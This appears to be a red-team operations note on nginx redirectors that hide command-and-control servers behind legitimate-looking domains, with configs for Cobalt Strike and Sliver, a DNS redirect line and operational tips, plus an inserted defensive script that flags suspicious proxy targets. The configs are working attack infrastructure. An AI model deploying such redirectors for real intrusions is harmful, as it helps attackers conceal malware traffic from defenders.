# C2 Redirectors (nginx)
## Purpose
Redirectors proxy C2 traffic through legitimate-looking infrastructure to hide the actual C2 server.
## Setup (nginx on Debian/Ubuntu)
```bash
# Install nginx, plus certbot and its nginx plugin for the HTTPS case
apt install nginx openssl certbot python3-certbot-nginx

# For HTTPS redirectors, get a cert (the domain's A record must already
# resolve to this host, or the HTTP-01 challenge fails):
certbot --nginx -d redirector.example.com
```
## HTTP Redirector Config
```nginx
server {
    listen 80;
    server_name redirector.example.com;

    location / {
        return 301 https://legitimate-site.com$request_uri;
    }
}

server {
    listen 443 ssl;
    server_name redirector.example.com;

    ssl_certificate /etc/letsencrypt/live/redirector.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/redirector.example.com/privkey.pem;

    location /static {
        proxy_pass https://legitimate-site.com;
        proxy_set_header Host legitimate-site.com;
    }

    # C2 traffic goes to actual C2
    location /jquery-3.6.0.min.js {
        proxy_pass http://10.0.0.5:8080;
    }
}
```
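A defender-side check for the pattern above, added here and not part of the original note: a minimal nginx-config walker that lists every `proxy_pass` target per `server_name` and flags literal private-IP upstreams, so whoever reviews a seized or suspect config (or audits their own web tier for an injected `location` block) can spot the one path forwarded somewhere else. `SAMPLE_CONF` is a constructed, condensed copy of the HTTPS block above; the parser covers only the directive/block/comment syntax used on this page (no quoted strings).

```python
import ipaddress
import re
from urllib.parse import urlsplit

SAMPLE_CONF = """
# constructed sample: the HTTPS server block from this note, condensed
server {
    server_name redirector.example.com;
    location /static { proxy_pass https://legitimate-site.com; }
    location /jquery-3.6.0.min.js { proxy_pass http://10.0.0.5:8080; }
}
"""

def parse(text):
    """nginx syntax -> nested (name, args, children); children is None for a directive."""
    toks = iter(t for t in re.findall(r"#[^\n]*|[{};]|[^\s{};]+", text) if t[0] != "#")
    def block():
        items, args = [], []
        for tok in toks:
            if tok == "}":
                break
            if tok in ";{":
                children = block() if tok == "{" else None  # block or plain directive
                if args:
                    items.append((args[0], args[1:], children))
                args = []
            else:
                args.append(tok)
        return items
    return block()

def is_private_ip(host):
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:  # a hostname or upstream group name, not a literal IP
        return False

def proxy_targets(items, server_name="?"):
    """Yield (server_name, location, upstream_host, private_ip) per proxy_pass."""
    for name, args, children in items:
        if children is None:
            continue
        sn = server_name
        if name == "server":  # pick up server_name for everything nested below
            sn = next((a[0] for n, a, _ in children if n == "server_name" and a), sn)
        if name == "location":
            for n, a, _ in children:
                if n == "proxy_pass" and a:
                    host = urlsplit(a[0]).hostname
                    yield sn, args[-1], host, is_private_ip(host)
        yield from proxy_targets(children, sn)  # nested locations, http{} wrappers
```

Run it over `/etc/nginx/sites-enabled/*` and a server whose locations fan out to more than one upstream host, or to an RFC 1918 address, is the one worth a closer look.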
## Cobalt Strike Redirector
```nginx
# For Cobalt Strike C2, route traffic based on URI.
# This location block belongs inside the `listen 443 ssl` server block above.
location /jquery-3.6.0.min.js {
    proxy_pass http://c2-server:80;
    proxy_set_header Host staging.hoolulu.com;
}
```
## Sliver Redirector
```nginx
# Sliver uses HTTPS with specific paths, so the upstream scheme must be https:
# the Sliver listener terminates TLS itself, and plaintext HTTP sent to port 443
# would just produce a 502. This block also belongs inside the `listen 443 ssl`
# server block above.
location /api/v2/status {
    proxy_pass https://sliver-server:443;
}
```
## DNS Redirector (for DNS C2)
```bash
# Setup DNS with dnsmasq: answer A queries for the C2 domain with the C2 IP.
# dnsmasq syntax is address=/<domain>/<ip>; domain and IP below are placeholders.
echo "address=/c2.example.com/10.0.0.5" >> /etc/dnsmasq.d/c2.conf
systemctl restart dnsmasq
```
## Operational Notes
- Use CDN domains when possible (Cloudflare, Akamai)
- Separate redirectors per operation
- Log everything for attribution if needed
- Test redirects before engagement